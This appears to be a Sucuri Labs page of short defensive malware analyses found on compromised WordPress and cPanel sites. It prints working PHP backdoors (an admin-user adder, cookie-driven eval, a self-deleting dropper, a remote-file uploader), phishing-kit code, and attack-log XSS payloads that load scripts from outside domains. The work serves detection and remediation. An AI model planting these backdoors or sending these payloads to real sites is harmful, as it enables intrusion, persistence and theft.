Sucuri Labs

The home of our Security Engineering Group, including our Threat Research, Technical Security and Automation teams.

User adder backdoor

As we’ve seen many times before, there are a variety of backdoors that can be planted on a website. Post-compromise, it's almost mandatory to review the list of users with admin capabilities within the website.

But, what if you check the list, remove a user, and it suddenly reappears again? Could it be a new compromise? Could there still be a backdoor present?

Here’s one of the possible culprits which was found within a theme’s functions.php file:

$createuser = wp_create_user('admin123', 'admin123', 'admin123@gmail.com');
$user_created = new WP_User($createuser);
$user_created -> set_role('administrator');

It’s a very simple piece of code that allows the attacker to maintain access to your website.

This shows how important it is to keep track of the integrity of your files, especially plugins and themes.

EE wireless provider phishing malware

A large number of phishing targets include popular services such as banks, payment providers, and email services.

In this type of attack, fraudsters create fake pages that appear to be legitimate content, but instead trick victims into disclosing sensitive information such as email accounts, logins, and passwords. This information is then collected and sent to them via email, or saved on a file in a compromised environment. The stolen information can be used to make fraudulent purchases, money transfers, sold on the darknet for profit, or other kinds of illegal activities.

During a recent remediation response, we found a phishing campaign that was targeting a very specific service — the popular UK wireless phone, broadband, and landline provider “EE”.

The malware itself is not very complex. It shows victims a copy of the original “EE” login page, which has been designed to trick users into entering their account information. Just like the majority of other phishing scams, the user is prompted to login in order to proceed.

Any submitted credentials are then emailed to the bad actor and are (likely) used to access their account.

An interesting aspect of this particular campaign is that the malicious script appears to be only targeting mobile users. It also records the user’s IP from whenever the page is accessed.
Here is a small snippet:

$useragent = $_SERVER['HTTP_USER_AGENT'];

if(preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i',substr($useragent,0,4)))  {

$_SESSION['mobile'] = true;

}

if(isset($_SESSION['mobile'])) {

   $mobile = true;

}

$v_ip = $_SERVER['REMOTE_ADDR'];
$hash = md5($v_ip);

The beginning of the form collects the login details and includes the hashed IP of the user:

<form name="userInformationForm" id="userInformationForm" 
method="POST" autocomplete="off" 
class="capture_form capture_userInformationForm" 
accept-charset="UTF-8" action="details.php?&sessionid=<?php echo $hash; ?>&securessl=true" 
onsubmit="return empty()">

The rest of the page is an exact copy of the login page found on the original site, but a few changes have been to the form responsible for submitting the login credentials — they are sent to another file and emailed to the attacker.

It's not entirely clear what are the objectives behind this phishing attempt are. Our first assumption was that bad actors were remotely accessing the SMS messages to capture a 2FA code sent from other services, however a quick investigated revealed that EE doesn't provide this service.

The second guess was that attackers are using the stolen credentials to change EE’s DNS servers on broadband routers to redirect customers to other phishing pages, however it doesn't seem to be possible.

If you use this provider and have some clues for us, please reach our team at labs[at]sucuri[dot]net.

New variant of “trollherten” malware

We continue to see new variations of obfuscation used to hide a PHP backdoor that began to be heavily used by malicious users in late 2018 - as we mentioned in a blog post at the time.


This variant tries to hide by compressing and encoding the malicious code, then using clever variables to try and mislead someone that may just be doing a cursory glance of the file’s code. In fact, the file and its coding has nothing at all to do with images or watermarks. Its true purpose is found on line 10:

$watermark='};'.urldecode(gzinflate(urldecode($lmagewatermark.$imagewatermark))).'{'; create_function('',$watermark);

This line of code defines the variable $watermark with the uncompressed, decoded data that was derived by using urldecode and gzinflate on the $imagewatermark variable. Now that we have the uncompressed, decoded data assigned to the $watermark variable, it will be easier for us to read the code:

};$GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev');
function _1178619035($i{
$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");
return $a[$i];}
function l__0($_0){
return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));
if(!empty($_1)){
$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));
if(isset($_1)){
@eval($_1);
exit();}}

And after further deobfuscating the PHP code’s arrays and text manipulation, we can see that this is the same malicious code that was mentioned in our past blog post in late 2018:

<?php
function cookie_or_request($_0){
return isset($_COOKIE[$_0]) ? $_COOKIE[$_0] : @$_POST[$_0];}
$rce = cookie_or_request('jweyc') . cookie_or_request('aeskoly') . cookie_or_request('owhggiku') . cookie_or_request('callbrhy');
if(!empty($rce)){
$rce = str_rot13(pack('H*', strrev($rce)));
if(isset($rce)){
@eval($rce);
exit();}}

Self-destruct malware

The majority of malware we find on compromised websites have been planted by bad actors with the intention of concealing and accessing backdoor access.

During a recent investigation, we found an interesting variation of this technique. The code was intentionally created to inject backdoors and other tools, but possessed an unusual feature: the injected content is executed only once before self-destructing.

Here is the sample:

<?php
error_reporting(E_ERROR);set_time_limit(0);
if(isset($_POST['zzz'])){
    $tofile='407.php';
    $a =base64_decode(strtr($_POST['zzz'], '-_,', '+/='));
    $a='<?php '.$a.'?>';
    @file_put_contents($tofile,$a);
    require_once('407.php');
    @unlink($tofile);
    exit;

}
?>

This malware is pretty simple and consists of only 13 lines. The code expects a $_POST request with the zzz variable.

Similarly to a malware dropper technique, the zzz variable is decoded and written into another file 407.php. In the statement require_once(), the injected content is evaluated (executed) and subsequently removed with the unlink() call.

The malware doesn't rely on known abused executable functions (for example, the eval() function) and doesn't store any encoded content, which are features that commonly trigger scanners used to detect possible malicious files.

Yet another variant of the cPanel user shadow...

We have discovered a new variant of PHP malware used to edit a cPanel users’s shadow file, allowing for bad actors to change passwords for all of the email accounts under that cPanel user.

In our past blog post, we analyzed this file’s abilities to modify email accounts. Today, we’ll focus on the new additions made to this variant.

At first glance, the code is not human readable. This is due to some layers of obfuscation, with the most obvious being that the majority of the code is encoded in base64.

The second layer of obfuscation becomes more apparent after decoding the base64 text from the _$X variable:

It looks like the malicious user decided to use a type of simple substitution cipher to further obfuscate the code, making it more difficult to detect.

To decode this simple substitution cipher, we used the following PHP:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=preg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);

This snippet first decodes the base64 string from _$X, then uses the strtr PHP function to substitute and replace characters in the decoded text based on the following table:

Cipher 1 2 3 4 5 6 a o u i e
Plaintext a o u i e 1 2 3 4 5 6

A prime example of this functionality would be the PHP variable used to store the values of common email ports:

$p2rts=1rr1y(ai, i87, uei, 660, 99i, 6uo , 99o);
$ports=array(25, 587, 465, 110, 995, 143 , 993);

After fully deobfuscating the malware’s code, it looks very similar to the previous variants—with the exception that this new version contains an uploader. This uploader is triggered whenever a _$GET request is sent with the defined string ?vvebos=olux.

Loading this malware file in a browser displays the following result:

As expected, the malware lists the email account(s) and their new password values, along with some helpful port scanning data for the malicious user. Bad actors can use this information to connect to the email accounts via the Webmail browser interface available on most cPanel hosting accounts. The default webmail ports are 2095 (HTTP) and 2096 (HTTPS) (e.g hxxp://domain.com:2095 or hxxps://domain.com:2096).

Plugins Under Attack: July 2019

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites:

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

Plugins that are continuing to be leveraged by attackers for months are:

 

Payloads added to the campaign

 

WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

myStickymenumyStickymenu

 

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

File Manager

 

192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

Appointment Booking Calendar

 

192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019:] "POST /wp-admin/admin-post.php HTTP/1.1"

FoldersFolders

 

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Staff List

 

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

Mobile App

 

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

 
 
 

Malicious Domains and IPs:

 

IPs:

192.169.157.142
185.225.16.152
178.128.57.173
185.238.0.146
185.238.0.135
45.12.32.55 
185.238.0.133
185.238.0.132
45.12.32.56
185.238.0.146
45.67.229.126
192.232.194.4

 
 

Domains Injected:

 

  • greatfacebookpage[.]com
  • greatinstagrampage[.]com
  • destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Simple but effective backdoor

We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning tools.

$a = "\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$b = "\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
@$b($_REQUEST['c'], @$a($_REQUEST['d']));

The two $a and $b variables contain the obfuscated PHP strings _file_getcontents and _file_putcontents as escaped hexadecimal values.

These two functions are combined with the _$REQUEST variable array, which allows the malicious user to submit data through their HTTP request to the file.

Deobfuscating the sample reveals the following code:

file_put_contents($_REQUEST['c']), file_get_contents($_REQUEST['d']));

These functions allow the attacker to exclude hard coded file names and content and change them at their leisure, making it more difficult to detect. The bad actor provides the desired content using the _file_putcontent($filename, $data) function during their HTTP request to the malicious file.

As you can see in the image, the HTTP parameters c and d provide the file name (shell.php) and define the download location (local or remote) for thee file name’s content.

In this example, I used shell.php for the c parameter and defined localhost/test.txt for the d parameter, which serves as the download location for _file_getcontents.The function _file_putcontents then inserts (and creates) file shell.php in the current directory.